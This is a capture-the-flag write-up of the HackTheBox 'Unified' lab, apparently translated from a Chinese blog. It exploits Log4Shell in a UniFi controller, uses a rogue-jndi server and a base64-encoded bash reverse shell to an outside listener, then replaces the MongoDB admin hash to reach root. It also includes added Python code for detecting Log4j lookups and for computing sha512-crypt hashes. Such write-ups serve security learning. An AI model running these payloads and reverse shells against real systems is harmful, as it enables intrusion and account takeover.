Unified

Reproduction

Start by finding a tutorial:

https://blog.csdn.net/qq_40927195/article/details/128811787

HackTheBox - Unified_unificms6.4.54 - Briyney's blog - CSDN Blog

The first step is a scan:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sC -sV 10.129.181.184
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 02:31 EDT
Nmap scan report for 10.129.181.184
Host is up (0.36s latency).
Not shown: 972 closed tcp ports (reset)
PORT STATE SERVICE VERSION
17/tcp filtered qotd
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
465/tcp filtered smtps
714/tcp filtered iris-xpcs
765/tcp filtered webster
1055/tcp filtered ansyslmd
1110/tcp filtered nfsd-status
1198/tcp filtered cajo-discovery
3001/tcp filtered nessus
3351/tcp filtered btrieve
3737/tcp filtered xpanel
3914/tcp filtered listcrt-port-2
4111/tcp filtered xgrid
5431/tcp filtered park-agent
5510/tcp filtered secureidprop
5906/tcp filtered rpas-c2
6789/tcp open ibm-db2-admin?
8011/tcp filtered unknown
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Tue, 25 Jul 2023 06:35:50 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
| Found</h1></body></html>
| GetRequest, HTTPOptions:
| HTTP/1.1 302
| Location: http://localhost:8080/manage
| Content-Length: 0
| Date: Tue, 25 Jul 2023 06:35:49 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Tue, 25 Jul 2023 06:35:50 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
| Request</h1></body></html>
| Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Tue, 25 Jul 2023 06:35:52 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
8192/tcp filtered sophos
8443/tcp open ssl/nagios-nsca Nagios NSCA
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
8649/tcp filtered unknown
9091/tcp filtered xmltec-xmlmail
9102/tcp filtered jetdirect
10025/tcp filtered unknown
10215/tcp filtered unknown
32777/tcp filtered sometimes-rpc17
38292/tcp filtered landesk-cba
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 411.50 seconds

Open ports: 22, 6789, 8080, 8443

The scan shows port 8080 open and running an HTTP proxy. The proxy appears to redirect requests to port 8443, which appears to be running an SSL web server. We note that the HTTP title of the page on port 8443 is "UniFi Network".

Visiting port 8080 redirects here: https://10.129.181.184:8443/manage/account/login?redirect=%2Fmanage

I won't paste screenshots, uploading them is too much hassle; it is basically a login page showing the UniFi 6.4.54 CMS (content management system).

Searching online for vulnerabilities in this version turns up CVE-2021-44228 (Apache Log4j remote code execution): NVD - CVE-2021-44228 (nist.gov)

More material on Log4j: What's Going on With Log4j? (hackthebox.com)

First capture a request; the next step is to verify whether this site is really affected by the vulnerability:

# original login request
POST /api/login HTTP/1.1
Host: 10.129.183.167:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.129.183.167:8443/manage/account/login?redirect=%2Fmanage
Content-Type: application/json; charset=utf-8
Origin: https://10.129.183.167:8443
Content-Length: 74
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
"username":"admin",
"password":"admin1234",
"remember":false,
"strict":true
}

payload: ${jndi:ldap://{TunX IP Address}/whatever}

Probe whether the injection point exists: if the request causes the server to connect back to us, then we have verified that the application is vulnerable.

JNDI is the acronym for the Java Naming and Directory Interface API. By calling this API, applications can locate resources and other program objects. A resource is a program object that provides a connection to a system such as a database server or a messaging system.

LDAP stands for Lightweight Directory Access Protocol, an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over the Internet or a network. LDAP runs on port 389 by default.

After confirming our IP with ifconfig, start listening on tun0:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:06:56.744094 IP 10.129.202.83.38274 > 10.10.14.84.ldap: Flags [S], seq 4090119358, win 64240, options [mss 1340,sackOK,TS val 4125686722 ecr 0,nop,wscale 7], length 0
08:06:56.744126 IP 10.10.14.84.ldap > 10.129.202.83.38274: Flags [R.], seq 0, ack 4090119359, win 0, length 0

The tcpdump output shows a connection arriving at our machine. This proves the application really is vulnerable, because it is trying to connect back to us on LDAP port 389.
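On the receiving side, the same probe is what a defender should be hunting for in the controller's request logs. The following is an added example and not code from the original writeup: a Python detector for Log4j lookup strings in log lines, run over constructed sample lines; it goes beyond the plain `${jndi:...}` form above by also collapsing the lower:/upper:/default-value nesting that public Log4Shell detection rules account for, so nested variants normalise to the same `${jndi:` string.

```python
import re

# Constructed sample request-log lines for the demo (not from the original page).
SAMPLE_LINES = [
    '10.10.14.84 POST /api/login {"username":"${jndi:ldap://10.10.14.84/whatever}","password":"x"}',
    '10.10.14.84 POST /api/login {"username":"${${lower:j}ndi:ldap://10.10.14.84/a}","password":"x"}',
    '10.10.14.84 POST /api/login {"username":"${${::-j}${::-n}${::-d}${::-i}:ldap://10.10.14.84/a}"}',
    '10.10.14.84 GET /manage ua="Mozilla/5.0 ${date:yyyy}"',
    '10.10.14.84 POST /api/login {"username":"alice","password":"Pa$$w0rd"}',
]

# An innermost ${...}: a body containing no nested '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate one innermost lookup the way Log4j 2 would, or return None
    when it is a real lookup (jndi, date, env, ...) that must be kept."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    key, sep, default = body.partition(":-")
    if sep and "jndi" not in key.lower():
        # ${::-x} or ${env:UNSET:-x}: the lookup fails and the default text is used
        return default
    return None


def _sub(match: re.Match) -> str:
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize(text: str) -> str:
    """Collapse resolvable inner lookups until only real lookups remain.
    Every substitution removes one '${', so the loop always terminates."""
    while True:
        new = _INNER.sub(_sub, text)
        if new == text:
            return text
        text = new


def classify(line: str) -> str:
    """'critical' for a JNDI lookup, 'suspicious' for any other ${...}
    lookup in untrusted input, 'clean' otherwise."""
    norm = normalize(line)
    if _JNDI.search(norm):
        return "critical"
    if "${" in norm:
        return "suspicious"
    return "clean"


def scan(lines):
    """Return (severity, normalized line) for each log line."""
    return [(classify(line), normalize(line)) for line in lines]


if __name__ == "__main__":
    for severity, norm in scan(SAMPLE_LINES):
        print(f"{severity:10s} {norm}")
```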

Install OpenJDK and Maven in order to build the payload, send it, and have it run on the target system:

OpenJDK is the Java Development Kit, used to build Java applications. Maven, on the other hand, is an integrated development environment (IDE) that can be used to create structured projects and compile our project into a jar file.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mvn -v
Apache Maven 3.8.7
Maven home: /usr/share/maven
Java version: 17.0.6, vendor: Debian, runtime: /usr/lib/jvm/java-17-openjdk-amd64
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "6.1.0-kali9-amd64", arch: "amd64", family: "unix"

Install and build the rogue-jndi tool:

git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

A successful build ends with:

[INFO] Replacing /home/kali/Desktop/rogue-jndi/target/RogueJndi-1.1.jar with /home/kali/Desktop/rogue-jndi/target/RogueJndi-1.1-shaded.jar
[INFO] Dependency-reduced POM written at: /home/kali/Desktop/rogue-jndi/dependency-reduced-pom.xml
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 07:29 min
[INFO] Finished at: 2023-07-31T07:54:52-04:00
[INFO] ------------------------------------------------------------------------

Look at the built, runnable program:

┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi]
└─# ls -al target
total 11692
drwxr-xr-x 6 root root 4096 Jul 31 07:54 .
drwxr-xr-x 5 root root 4096 Jul 31 07:54 ..
drwxr-xr-x 4 root root 4096 Jul 31 07:51 classes
drwxr-xr-x 3 root root 4096 Jul 31 07:51 generated-sources
drwxr-xr-x 2 root root 4096 Jul 31 07:52 maven-archiver
drwxr-xr-x 3 root root 4096 Jul 31 07:51 maven-status
-rw-r--r-- 1 root root 22240 Jul 31 07:52 original-RogueJndi-1.1.jar
-rw-r--r-- 1 root root 11920109 Jul 31 07:54 RogueJndi-1.1.jar

View rogue-jndi's help:

┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi]
└─# cd target

┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi/target]
└─# java -jar RogueJndi-1.1.jar --help
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Usage: java -jar target/RogueJndi-1.0.jar [options]
Options:
-c, --command Command to execute on the target server (default:
/Applications/Calculator.app/Contents/MacOS/Calculator)
-n, --hostname Local HTTP server hostname (required for remote
classloading and websphere payloads) (default: 127.0.1.1)
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8000)
--wsdl [websphere1 payload option] WSDL file with XXE payload
(default: /list.wsdl)
--localjar [websphere2 payload option] Local jar file to load (this
file should be located on the remote server) (default:
../../../../../tmp/jar_cache7808167489549525095.tmp)
-h, --help Show this help

We can see that --command is followed by the system command to execute, so we can write a reverse shell.
To avoid the data getting mangled in transit, we base64-encode the reverse shell command:
echo "/bin/bash -c '/bin/bash -i >&/dev/tcp/10.10.14.179/4444 0>&1'" | base64
This gives the base64-encoded shell:

┌──(kali㉿kali)-[~/Desktop]
└─$ echo "/bin/bash -c '/bin/bash -i >&/dev/tcp/10.10.14.84/4444 0>&1'" | base64

L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+
JjEnCg==

Start rogue-jndi with the encoded reverse shell as its command, and listen on port 4444:

┌──(root㉿kali)-[/home/kali/Desktop/rogue-jndi/target]
└─# java -jar RogueJndi-1.1.jar --command "bash -c {echo,L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+JjEnCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.84"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.84:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.84:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.84:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.84:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.84:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.84:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.84:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.84:1389/o=groovy to artsploit.controllers.Groovy
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.129.202.83: inverse host lookup failed: Unknown host
connect to [10.10.14.84] from (UNKNOWN) [10.129.202.83] 48416
bash: cannot set terminal process group (7): Inappropriate ioctl for device
bash: no job control in this shell
unifi@unified:/usr/lib/unifi$
unifi@unified:/usr/lib/unifi$ ls -al
ls -al
total 40
drwxr-xr-x 1 unifi unifi 4096 Jul 31 12:36 .
drwxr-xr-x 1 root root 4096 Jan 2 2022 ..
drwxr-xr-x 2 unifi unifi 4096 Jan 2 2022 bin
lrwxrwxrwx 1 root root 11 Sep 20 2021 data -> /unifi/data
drwxr-xr-x 3 unifi unifi 4096 Jan 2 2022 dl
drwxr-xr-x 3 unifi unifi 12288 Jan 2 2022 lib
lrwxrwxrwx 1 root root 10 Sep 20 2021 logs -> /unifi/log
lrwxrwxrwx 1 root root 14 Sep 20 2021 run -> /var/run/unifi
drwxr-xr-x 3 unifi unifi 4096 Jan 2 2022 webapps
drwxr-xr-x 3 unifi unifi 4096 Jul 31 12:36 work
unifi@unified:/usr/lib/unifi$

Find the user flag:

unifi@unified:/home/michael$ cat user.txt
cat user.txt
6ced1a6a89e666c0620cdb10262ba127

Privilege escalation:

Looking at the process list, we find: bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1

MongoDB is a source-available, cross-platform, document-oriented database program.
MongoDB is classified as a NoSQL database program; it uses JSON-like documents with optional schemas.

unifi@unified:/usr/lib/unifi$ ps aux
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
unifi 1 0.0 0.0 1080 4 ? Ss 12:36 0:00 /sbin/docker-init -- /usr/local/bin/docker-entrypoint.sh unifi
unifi 7 0.0 0.1 18512 3044 ? S 12:36 0:00 bash /usr/local/bin/docker-entrypoint.sh unifi
unifi 17 0.8 27.3 3676460 555952 ? Sl 12:36 0:53 java -Dunifi.datadir=/unifi/data -Dunifi.logdir=/unifi/log -Dunifi.rundir=/var/run/unifi -Xmx1024M -Djava.awt.headless=true -Dfile.encoding=UTF-8 -jar /usr/lib/unifi/lib/ace.jar start
unifi 67 0.2 4.1 1101696 85156 ? Sl 12:36 0:17 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi 1969 0.0 0.1 18380 3088 ? S 13:45 0:00 bash -c {echo,L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+JjEnCg==}|{base64,-d}|{bash,-i}
unifi 1973 0.0 0.1 18512 3288 ? S 13:45 0:00 bash -i
unifi 1976 0.0 0.1 18380 2992 ? S 13:45 0:00 /bin/bash -c /bin/bash -i >&/dev/tcp/10.10.14.84/4444 0>&1
unifi 1977 0.0 0.1 18512 3448 ? S 13:45 0:00 /bin/bash -i
unifi 2874 0.0 0.1 18380 3104 ? S 14:18 0:00 bash -c {echo,L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNC44NC80NDQ0IDA+JjEnCg==}|{base64,-d}|{bash,-i}
unifi 2878 0.0 0.1 18512 3356 ? S 14:18 0:00 bash -i
unifi 2881 0.0 0.1 18380 2984 ? S 14:18 0:00 /bin/bash -c /bin/bash -i >&/dev/tcp/10.10.14.84/4444 0>&1
unifi 2882 0.0 0.1 18512 3216 ? S 14:18 0:00 /bin/bash -i
unifi 2899 0.0 0.1 34408 2824 ? R 14:19 0:00 ps aux

Let's interact with the MongoDB service using the mongo command-line utility and try to extract the administrator password. A quick Google search for "UniFi Default Database" shows that the UniFi application's default database name is ace.

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "administrator@unified.htb",
"x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
"time_created" : NumberLong(1640900495),
"last_site_name" : "default",

The output shows a user named administrator. Their password hash is in the x_shadow field, but in this case no password-cracking utility can crack it. Instead, we can replace the x_shadow hash with one we create ourselves, so that the administrator password is replaced and we can authenticate to the admin panel. For this we can use the mkpasswd command-line utility.

First run mkpasswd -m sha-512 password to get the SHA-512 crypt hash of "password":

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mkpasswd -m sha-512 password
$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V.

Change the administrator password to "password":

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$hwb9W.VC28pwXtPT$N8DRe.81H.wB3NN5Ac/5zhGdQkKAibE/i/7I6kvKaVbWGYApa9EghEhtyqtz39qS6x6oDNRNo5z9Nk9m2VMio0"}})'
<aVbWGYApa9EghEhtyqtz39qS6x6oDNRNo5z9Nk9m2VMio0"}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
2023-07-31T15:15:08.132+0100 E QUERY [thread1] SyntaxError: illegal character @(shell eval):1:66

SHA-512, or Secure Hash Algorithm 512, is a hashing algorithm that converts text of any length into a fixed-size string. Every SHA-512 output is 512 bits (64 bytes) long. The algorithm is commonly used for email address hashing, password hashing, and so on.

A salt is added during hashing to force uniqueness, increasing the hash's complexity without adding any burden on the user and mitigating password attacks such as hash tables.
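To make the salted scheme concrete, here is an added Python implementation (not from the original writeup) of the crypt(3) sha512 algorithm that mkpasswd -m sha-512 uses. It recomputes the page's own hash for "password" with salt eLXCcCov55K4HCAT, checks a candidate password against a stored `$6$salt$hash` string, and shows that the same password with a different salt gives a different hash; it assumes crypt's default of 5000 rounds and does not handle the `rounds=` prefix.

```python
import hashlib
import hmac

_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# crypt(3) emits the 64 digest bytes in this rotated (j, j+21, j+42) order.
_ORDER = [(j, j + 21, j + 42)[j % 3:] + (j, j + 21, j + 42)[:j % 3] for j in range(21)]


def _b64_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    """Pack three bytes into 24 bits and emit n chars, low 6 bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(_B64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512_crypt(password: str, salt: str, rounds: int = 5000) -> str:
    """Return '$6$<salt>$<hash>' as glibc crypt / mkpasswd -m sha-512 would."""
    pw = password.encode()
    sl = salt.encode()[:16]  # crypt truncates the salt to 16 bytes
    # Digest B = H(pw + salt + pw) is mixed into A in a length-dependent pattern.
    b = hashlib.sha512(pw + sl + pw).digest()
    a = hashlib.sha512(pw + sl)
    a.update(b * (len(pw) // 64) + b[: len(pw) % 64])
    n = len(pw)
    while n > 0:  # one update per bit of len(pw): B for a 1 bit, pw for a 0 bit
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    # P and S: password and salt stretched to their own lengths via extra digests.
    dp = hashlib.sha512(pw * len(pw)).digest()
    p = (dp * (len(pw) // 64 + 1))[: len(pw)]
    ds = hashlib.sha512(sl * (16 + a[0])).digest()
    s = (ds * (len(sl) // 64 + 1))[: len(sl)]
    # The slow part: chained SHA-512 rounds with a fixed mixing schedule.
    c = a
    for i in range(rounds):
        h = hashlib.sha512()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    encoded = "".join(_b64_24bit(c[x], c[y], c[z], 4) for x, y, z in _ORDER)
    encoded += _b64_24bit(0, 0, c[63], 2)
    return "$6$" + sl.decode() + "$" + encoded


def verify(password: str, stored: str) -> bool:
    """Check a candidate password against a '$6$salt$hash' string (constant-time compare)."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "6":
        raise ValueError("expected a sha512-crypt hash without a rounds= prefix")
    return hmac.compare_digest(sha512_crypt(password, parts[2]), stored)


# The x_shadow value the writeup writes into MongoDB (taken from the page above).
PAGE_HASH = ("$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ez"
             "CtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V.")

if __name__ == "__main__":
    print(verify("password", PAGE_HASH))  # True: the page's hash is 'password'
    print(sha512_crypt("password", "anothersalt") != PAGE_HASH)  # True: new salt, new hash
```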

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V."}})'
<q2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V."}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
unifi@unified:/usr/lib/unifi$

Check whether the update succeeded:

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "administrator@unified.htb",
"x_shadow" : "$6$eLXCcCov55K4HCAT$29tc0YWNS6dOqvVCwzgLqzEjpAgZCGejesNSDxBaq2wYqVKvx1ezCtB9Py49tVIH9jc0Z1F778xCAgCuwAv1V.",
"time_created" : NumberLong(1640900495),
"last_site_name" : "default",

Log in successfully as administrator with the new password; under Settings the root password can be found: NotACrackablePassword4U2022. Connect as root over SSH:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh root@10.129.202.83
root@10.129.202.83's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Finally, the root flag is here:

root@unified:~# ls
root.txt
root@unified:~# cat root.txt
e50bc93c75b634e4b272d2f771c33681

Listening

  1. You may be wondering what it is, and why people are so concerned about it. Some even call it the worst vulnerability since WannaCry.
  2. Log4j is a popular logging library for Java created in 2001. It is part of the Apache Software Foundation, however, this doesn’t mean the maintainers are paid. All of their work is volunteer-based.
  3. The logging library’s main purpose is to provide developers with a way to change the format and verbosity of logging through configuration files versus code.